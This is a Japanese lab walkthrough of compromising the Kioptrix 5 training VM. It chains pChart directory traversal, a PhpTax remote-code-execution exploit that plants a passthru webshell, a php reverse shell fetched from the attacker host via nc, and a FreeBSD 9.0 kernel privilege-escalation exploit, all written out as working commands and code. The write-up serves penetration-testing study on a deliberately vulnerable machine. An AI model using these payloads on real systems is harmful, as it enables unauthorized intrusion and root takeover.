kioptrix 5(1-4)

何も考えずに、いつも通り仮想ディスクを作らないで後からIDEを追加しても起動しなかった。
元々配信されていたイメージ(.vmdk)に加えて、*fix.zipをダウンロードする。
*fix.zipに含まれている「*.vbox」からVMを作り、すでにセットされているストレージを消して改めて「*.vmdk」をIDEに追加する。
その後、*fix.zipに含まれていた画像にある通り、VMを起動した後の「mountroot>」プロンプトにてufs:/dev/ada0p2と入力すると起動した。

pentest

サービス調査

# nmap -p- 10.10.10.8
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-30 08:13 EDT
Nmap scan report for 10.10.10.8
Host is up (0.00067s latency).
Not shown: 65532 filtered ports
PORT     STATE  SERVICE
22/tcp   closed ssh
80/tcp   open   http
8080/tcp open   http-proxy
MAC Address: 08:00:27:73:6F:80 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 117.95 seconds
# nmap -p22,80,8080 -sV -version-all 10.10.10.8
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-30 08:17 EDT
Nmap scan report for 10.10.10.8
Host is up (0.00072s latency).

PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 08:00:27:73:6F:80 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.64 seconds

nmap長いなぁ

気になりどころ

• port80 Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
• port8080 Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)

詳細

80ポートのApacheからのアプローチ

# nikto -h 10.10.10.8
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.8
+ Target Hostname:    10.10.10.8
+ Target Port:        80
+ Start Time:         2020-04-30 08:21:42 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
+ Server may leak inodes via ETags, header found with file /, inode: 67014, size: 152, mtime: Sat Mar 29 13:22:52 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ PHP/5.3.8 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ OpenSSL/0.9.8q appears to be outdated (current is at least 1.1.1). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ 8672 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2020-04-30 08:23:20 (GMT-4) (98 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
# dirb http://10.10.10.8

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Apr 30 08:29:52 2020
URL_BASE: http://10.10.10.8/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.8/ ----
+ http://10.10.10.8/cgi-bin/ (CODE:403|SIZE:210)                               
+ http://10.10.10.8/index.html (CODE:200|SIZE:152)                             
                                                                               
-----------------
END_TIME: Thu Apr 30 08:30:18 2020
DOWNLOADED: 4612 - FOUND: 2

「CVE-2002-0082」ってkioptrix1でもあった気がするが刺さるのか？
どうやらapacheのバージョンが一致しないので刺さらないらしい。
Apacheのバージョンにも何も無さそうだし、phpにも何も無いので詰みかぁ。
と思ったがindex.htmlのソースを見てみると

<html>
 <head>
  <!--
  <META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php">
  -->
 </head>

 <body>
  <h1>It works!</h1>
 </body>
</html>

「pChart2.1.3/index.php」?
アクセスする。
何か管理画面ぽいのが出てきた。

# searchsploit pChart 2.1
--------------------------------------- ----------------------------------------
 Exploit Title                         |  Path
                                       | (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
pChart 2.1.3 - Multiple Vulnerabilitie | exploits/php/webapps/31173.txt
--------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
# cat /usr/share/exploitdb/exploits/php/webapps/31173.txt

# Exploit Title: pChart 2.1.3 Directory Traversal and Reflected XSS
# Date: 2014-01-24
# Exploit Author: Balazs Makany
# Vendor Homepage: www.pchart.net
# Software Link: www.pchart.net/download
# Google Dork: intitle:"pChart 2.x - examples" intext:"2.1.3"
# Version: 2.1.3
# Tested on: N/A (Web Application. Tested on FreeBSD and Apache)
# CVE : N/A

[0] Summary:
PHP library pChart 2.1.3 (and possibly previous versions) by default
contains an examples folder, where the application is vulnerable to
Directory Traversal and Cross-Site Scripting (XSS).
It is plausible that custom built production code contains similar
problems if the usage of the library was copied from the examples.
The exploit author engaged the vendor before publicly disclosing the
vulnerability and consequently the vendor released an official fix
before the vulnerability was published.


[1] Directory Traversal:
"hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd"
The traversal is executed with the web server's privilege and leads to
sensitive file disclosure (passwd, siteconf.inc.php or similar),
access to source codes, hardcoded passwords or other high impact
consequences, depending on the web server's configuration.
This problem may exists in the production code if the example code was
copied into the production environment.

Directory Traversal remediation:
1) Update to the latest version of the software.
2) Remove public access to the examples folder where applicable.
3) Use a Web Application Firewall or similar technology to filter
malicious input attempts.


[2] Cross-Site Scripting (XSS):
"hxxp://localhost/examples/sandbox/script/session.php?<script>alert('XSS')</script>
This file uses multiple variables throughout the session, and most of
them are vulnerable to XSS attacks. Certain parameters are persistent
throughout the session and therefore persists until the user session
is active. The parameters are unfiltered.

Cross-Site Scripting remediation:
1) Update to the latest version of the software.
2) Remove public access to the examples folder where applicable.
3) Use a Web Application Firewall or similar technology to filter
malicious input attempts.


[3] Disclosure timeline:
2014 January 16 - Vulnerability confirmed, vendor contacted
2014 January 17 - Vendor replied, responsible disclosure was orchestrated
2014 January 24 - Vendor was inquired about progress, vendor replied
and noted that the official patch is released.

色々あるみたいなのでやってみる。

firefoxから「http://10.10.10.8/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd」へのアクセス

# $FreeBSD: release/9.0.0/etc/master.passwd 218047 2011-01-28 22:29:38Z pjd $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
mysql:*:88:88:MySQL Daemon:/var/db/mysql:/usr/sbin/nologin
ossec:*:1001:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecm:*:1002:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecr:*:1003:1001:User &:/usr/local/ossec-hids:/sbin/nologin

firefoxにて、↑のディレクトリトラバーサルと http://10.10.10.8/pChart2.1.3/examples/sandbox/script/session.php?<script>alert('XSS')</script>の発火を確認。
ディレクトリトラバーサルできるけど何見れば良いか分からん。
そういや、dirbで403出てるディレクトリあったのでそこにアクセス制御してそうな「.htaccess」とか「httpd.conf」でも見てみるか。
「.htaccess」は無いっぽい。
「 /etc/httpd/conf/httpd.conf」無い？
「/usr/local/apache2/conf/」でもない？
そういえばhttpd.confってOSごとに場所違った気がするので、今回FreeBSDだし違うとこにありそう。
推測参考 FreeBSDでApacheのインストールと起動 - Qiita
今回はApache 2.2.xなので、「/usr/local/etc/apache22/httpd.conf」と予測。

firefoxで「http://192.168.1.68/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf」へアクセス

#
# This is the main Apache HTTP server configuration file.  It contains the
# configuration directives that give the server its instructions.
# See <URL:http://httpd.apache.org/docs/2.2> for detailed information.
# In particular, see 
# <URL:http://httpd.apache.org/docs/2.2/mod/directives.html>
# for a discussion of each configuration directive.
#
# Do NOT simply read the instructions in here without understanding
# what they do.  They're here only as hints or reminders.  If you are unsure
# consult the online docs. You have been warned.  
#
# Configuration and logfile names: If the filenames you specify for many
# of the server's control files begin with "/" (or "drive:/" for Win32), the
# server will use that explicit path.  If the filenames do *not* begin
# with "/", the value of ServerRoot is prepended -- so "/var/log/foo_log"
# with ServerRoot set to "/usr/local" will be interpreted by the
# server as "/usr/local//var/log/foo_log".

#
# ServerRoot: The top of the directory tree under which the server's
# configuration, error, and log files are kept.
#
# Do not add a slash at the end of the directory path.  If you point
# ServerRoot at a non-local disk, be sure to point the LockFile directive
# at a local disk.  If you wish to share the same ServerRoot for multiple
# httpd daemons, you will need to change at least LockFile and PidFile.
#
ServerRoot "/usr/local"

#
# Listen: Allows you to bind Apache to specific IP addresses and/or
# ports, instead of the default. See also the <VirtualHost>
# directive.
#
# Change this to Listen on specific IP addresses as shown below to 
# prevent Apache from glomming onto all bound IP addresses.
#
#Listen 12.34.56.78:80
Listen 80
Listen 8080
(snip)
# "/usr/local/www/apache22/cgi-bin" should be changed to whatever your ScriptAliased
# CGI directory exists, if you have that configured.
#
<Directory "/usr/local/www/apache22/cgi-bin">
    AllowOverride None
    Options None
    Order allow,deny
    Allow from all
</Directory>

(snip)

SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser

<VirtualHost *:8080>
    DocumentRoot /usr/local/www/apache22/data2

<Directory "/usr/local/www/apache22/data2">
    Options Indexes FollowSymLinks
    AllowOverride All
    Order allow,deny
    Allow from env=Mozilla4_browser
</Directory>



</VirtualHost>


Include etc/apache22/Includes/*.conf

ちゃんとありました。
やはり、httpd.confでアクセス制御をしていたようで。
port 8080もアクセス制御がされているようだけど、「Mozilla4_browser」だけアクセスできる？

# curl -XGET -H "User-Agent:Mozilla/4.0" 10.10.10.8:8080
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /</title>
 </head>
 <body>
<h1>Index of /</h1>
<ul><li><a href="phptax/"> phptax/</a></li>
</ul>
</body></html>

phptax?

# searchsploit phptax
----------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                               |  Path
                                                                             | (/usr/share/exploitdb/)
----------------------------------------------------------------------------- ----------------------------------------
PhpTax - 'pfilez' Execution Remote Code Injection (Metasploit)               | exploits/php/webapps/21833.rb
PhpTax 0.8 - File Manipulation 'newvalue' / Remote Code Execution            | exploits/php/webapps/25849.txt
phptax 0.8 - Remote Code Execution                                           | exploits/php/webapps/21665.txt
----------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

metasploitは使いたくない。
でもphptaxのバージョン分からんし一か八か試すか？
しかし調べてみたところ、ver0.8が最新バージョンぽい？
そうだとしたらガバガバセキュリティだが、それにかける。
新しい方の、25849.txtでチャレンジ。

# cat /usr/share/exploitdb/exploits/php//webapps/25849.txt 
#
#  ,--^----------,--------,-----,-------^--,
#  | |||||||||   `--------'     |          O .. CWH Underground Hacking Team ..
#  `+---------------------------^----------|
#    `\_,-------, _________________________|
#      / XXXXXX /`|     /
#     / XXXXXX /  `\   /
#    / XXXXXX /\______(
#   / XXXXXX /          
#  / XXXXXX /
# (________(            
#  `------'

# Exploit Title   : PhpTax File Manipulation(newvalue,field) Remote Code Execution
# Date            : 31 May 2013
# Exploit Author  : CWH Underground
# Site            : www.2600.in.th
# Vendor Homepage : http://phptax.sourceforge.net/
# Software Link   : http://sourceforge.net/projects/phptax/
# Version         : 0.8
# Tested on       : Window and Linux


#####################################################
#VULNERABILITY: FILE MANIPULATION TO REMOTE COMMAND EXECUTION
#####################################################

#index.php

#LINE 32: fwrite fwrite($zz, "$_GET['newvalue']"); 
#LINE 31: $zz = fopen("./data/$field", "w"); 
#LINE  2: $field = $_GET['field']; 

#####################################################
#DESCRIPTION
#####################################################

#An attacker might write to arbitrary files or inject arbitrary code into a file with this vulnerability. 
#User tainted data is used when creating the file name that will be opened or when creating the string that will be written to the file. 
#An attacker can try to write arbitrary PHP code in a PHP file allowing to fully compromise the server.


#####################################################
#EXPLOIT
#####################################################

<?php
 
$options = getopt('u:');
   
if(!isset($options['u']))
die("\n        Usage example: php exploit.php -u http://target.com/ \n"); 
   
$url     =  $options['u'];
$shell = "{$url}/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E";

$headers = array('User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)',
'Content-Type: text/plain');
   
echo "        [+] Submitting request to: {$options['u']}\n";
   
$handle = curl_init();
   
curl_setopt($handle, CURLOPT_URL, $url);
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
   
$source = curl_exec($handle);
curl_close($handle);
   
if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r'))
{
echo "        [+] Exploit completed successfully!\n";
echo "        ______________________________________________\n\n        {$url}/data/rce.php?cmd=id\n";
}
else
{
die("        [+] Exploit was unsuccessful.\n");
}
    
?>  

################################################################################################################
# Greetz      : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2 
################################################################################################################

テキストだけかと思ったがちゃんとexploitついている。
「/phptax/index.php」の「2,31,32行目」に問題があるからexploitできるということか。
心配なので一応「usr/local/apache22//phptax/index.php」を確認。

# curl -vI -XGET -H "User-Agent:Mozilla/4.0" 10.10.10.8:8080/phptax/index.php
*   Trying 10.10.10.8:8080...
* TCP_NODELAY set
* Connected to 10.10.10.8 (10.10.10.8) port 8080 (#0)
> GET /phptax/index.php HTTP/1.1
> Host: 10.10.10.8:8080
> Accept: */*
> User-Agent:Mozilla/4.0
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
HTTP/1.1 200 OK
< Date: Fri, 01 May 2020 03:44:35 GMT
Date: Fri, 01 May 2020 03:44:35 GMT
< Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
< X-Powered-By: PHP/5.3.8
X-Powered-By: PHP/5.3.8
< Transfer-Encoding: chunked
Transfer-Encoding: chunked
< Content-Type: text/html
Content-Type: text/html

< 
* Excess found: excess = 4131 url = /phptax/index.php (zero-length body)
* Connection #0 to host 10.10.10.8 left intact

firefoxで「http://10.10.10.8/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/www/apache22/data2/phptax/index.php」へアクセス。
ファイルのありかは「httpd.conf」から分かる。

<?php
$field=$_GET[field];
(snip)

   if ($_GET[newvalue]) {
       $zz=fopen("./data/$field","w");
       fwrite($zz,"$_GET[newvalue]");
       fclose($zz);
   }

(snip)

ということで、「25849.txt」にならってexploitコードを書き換えれば良いと言うことか。

# cp /usr/share/exploitdb/exploits/php//webapps/25849.txt  phptax_exploit.php

このexploit使おうとしたら「curl_init()」知らないと怒られたので入れる。

# php -v
PHP 7.3.15-3 (cli) (built: Feb 23 2020 07:15:44) ( NTS )
(snip)
# apt install php7.3-curl

よっしゃこれでいけるか。

# php phptax_exploit.php -u http://10.10.10.8:8080/phptax
(snip)
#####################################################
#EXPLOIT
#####################################################

        [+] Submitting request to: http://10.10.10.8:8080/phptax
        [+] Exploit was unsuccessful.

はい。ダメです。
もう分からんからシェルスクリプトで書き直す。

# !/bin/sh
# ./phptax_exploit.sh

# phptax < ver 0.8 exploit

# vulncode in phptax/index.php
#     $field = $_GET['field']; in line 2
#     $zz = fopen("./data/$field", "w"); in line 31
#     fwrite fwrite($zz, "$_GET['newvalue']"); in line 32

target_site_to_phptax_index_path="$1" #example "http://10.10.10.8:8080/phptax/"
remote_code="$2" #example "id" URLencode!!!! space is "%20"
curl -vI -H "User-Agent:Mozilla/4.0" "$1/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E"
echo -e "\n"
curl -H "User-Agent:Mozilla/4.0" "http://10.10.10.8:8080/phptax/data/rce.php?cmd=$2"

適当に書いたから許して。
何故かここからreverse shellに苦戦。
結局上手くいったのは、reverse shellするphpを送り付けて実行するパターン。

php-reverse-shellがkaliの場合ある
# cp /usr/share/webshells/php/php-reverse-shell.php reverse.php


#### ここら辺変える
$VERSION = "1.0";
$ip = '10.10.10.3';  // CHANGE THIS
$port = 443;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

window 1
# nc -nlvp 8080 < reverse.php

window 2
# ./phptax_exploit.sh http://10.10.10.8:8080/phptax nc%2010.10.10.3%208080%20%3E%20reverse.php%20\&

window 1
# nc -nlvp 443

windows 2
# curl -v -XGET -H "User-Agent:Mozilla/4.0" "http://10.10.10.8:8080/phptax/data/reverse.php

やっとシェル取れた。

$ id
uid=80(www) gid=80(www) groups=80(www)
$ uname -a
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64

FreeBSD 9.0は果たしてあるか。

# searchsploit FreeBSD 9.0
----------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                               |  Path
                                                                             | (/usr/share/exploitdb/)
----------------------------------------------------------------------------- ----------------------------------------
FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation                       | exploits/freebsd/local/28718.c
FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Local Privilege Escalation                 | exploits/freebsd/local/26368.c
----------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

ちょうど良さそうなのがあるので、「28718.c」を試す。

# cp /usr/share/exploitdb/exploits/freebsd/local/28718.c freebsd9.0_priv.c

このプログラムは改行無いと怒られたので改行忘れずに。

victim
$ wget http://10.10.10.3/freebsd9.0_priv.c
wget: not found

マジか。
またncでファイルやりとりするか。

attacker
# nc -nlvp 8080 < freebsd9.0_priv.c

victim
$ cd /tmp
$ nc 10.10.10.3 8080 > priv.c
$ gcc priv.c
$ ./a.out
[+] SYSRET FUCKUP!!
[+] Start Engine...
[+] Crotz...
[+] Crotz...
[+] Crotz...
[+] Woohoo!!!
$ id
uid=0(root) gid=0(wheel) groups=0(wheel)
$ cd /root  
$ ls
.cshrc
.history
.k5login
.login
.mysql_history
.profile
congrats.txt
folderMonitor.log
httpd-access.log
lazyClearLog.sh
monitor.py
ossec-alerts.log
$ cat congrats.txt
If you are reading this, it means you got root (or cheated).
Congratulations either way...

Hope you enjoyed this new VM of mine. As always, they are made for the beginner in 
mind, and not meant for the seasoned pentester. However this does not mean one 
can't enjoy them.

As with all my VMs, besides getting "root" on the system, the goal is to also
learn the basics skills needed to compromise a system. Most importantly, in my mind,
are information gathering & research. Anyone can throw massive amounts of exploits
and "hope" it works, but think about the traffic.. the logs... Best to take it
slow, and read up on the information you gathered and hopefully craft better
more targetted attacks. 

For example, this system is FreeBSD 9. Hopefully you noticed this rather quickly.
Knowing the OS gives you any idea of what will work and what won't from the get go.
Default file locations are not the same on FreeBSD versus a Linux based distribution.
Apache logs aren't in "/var/log/apache/access.log", but in "/var/log/httpd-access.log".
It's default document root is not "/var/www/" but in "/usr/local/www/apache22/data".
Finding and knowing these little details will greatly help during an attack. Of course
my examples are specific for this target, but the theory applies to all systems.

As a small exercise, look at the logs and see how much noise you generated. Of course
the log results may not be accurate if you created a snapshot and reverted, but at least
it will give you an idea. For fun, I installed "OSSEC-HIDS" and monitored a few things.
Default settings, nothing fancy but it should've logged a few of your attacks. Look
at the following files:
/root/folderMonitor.log
/root/httpd-access.log (softlink)
/root/ossec-alerts.log (softlink)

The folderMonitor.log file is just a cheap script of mine to track created/deleted and modified
files in 2 specific folders. Since FreeBSD doesn't support "iNotify", I couldn't use OSSEC-HIDS 
for this.
The httpd-access.log is rather self-explanatory .
Lastly, the ossec-alerts.log file is OSSEC-HIDS is where it puts alerts when monitoring certain
files. This one should've detected a few of your web attacks.

Feel free to explore the system and other log files to see how noisy, or silent, you were.
And again, thank you for taking the time to download and play.
Sincerely hope you enjoyed yourself.

Be good...


loneferret
http://www.kioptrix.com


p.s.: Keep in mind, for each "web attack" detected by OSSEC-HIDS, by
default it would've blocked your IP (both in hosts.allow & Firewall) for
600 seconds. I was nice enough to remove that part :)

やったぜ。

終わり

exploitコードが改行無いのはデフォ？